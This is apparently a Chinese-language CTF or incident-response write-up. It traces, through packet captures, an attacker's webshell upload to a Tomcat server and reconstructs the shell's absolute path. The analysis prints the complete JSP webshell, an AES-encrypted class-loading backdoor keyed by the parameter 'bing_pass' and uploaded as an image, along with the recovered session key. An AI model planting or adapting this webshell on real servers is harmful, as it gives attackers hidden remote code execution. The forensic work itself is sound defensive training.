题目描述 #

关卡描述：黑客上传的webshell绝对路径是什么？

Flag #

tcp.stream eq 51

POST /api/upload HTTP/1.1
Host: 202.1.1.66:8080

{"msg":"..................http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp","code":0,"url":"http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp"}

没有靶机的情况下，那就只能动动脑子了

tcp.stream eq 51

POST /api/upload HTTP/1.1
Host: 202.1.1.66:8080

--628c1882-2027-4c85-a009-e4cd41af99a9
Content-Disposition: form-data; name="avatar"; filename="pic.jsp"
Content-Type: image/jpeg
Content-Length: 17

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("bing_pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
--628c1882-2027-4c85-a009-e4cd41af99a9--

先找到密码了bing_pass

ip.addr == 202.1.1.66 && http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6"

tcp.stream eq 76

tcp.stream eq 76 
b99f657b04941030  # 密钥

BlueTeamTools 解密Webshell流量 使用获得的密钥和密码，对webshell首次成功连接的数据包解密成功。

原始数据
86a6e613cecd45be680facdb95830327a565f74aa74d7aa9e80eaf710f0ff70868cdf542d12cd5f72f1bd …… 5363ab6626393e70ef5793c33d5a05d22c6de

CATALINA_HOME=/usr/local/tomcat
/usr/local/tomcat/webapps

通过IP:PORT这种方式可以访问，jsp写入在

/usr/local/tomcat/webapps/ROOT

拼凑一下吧

/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp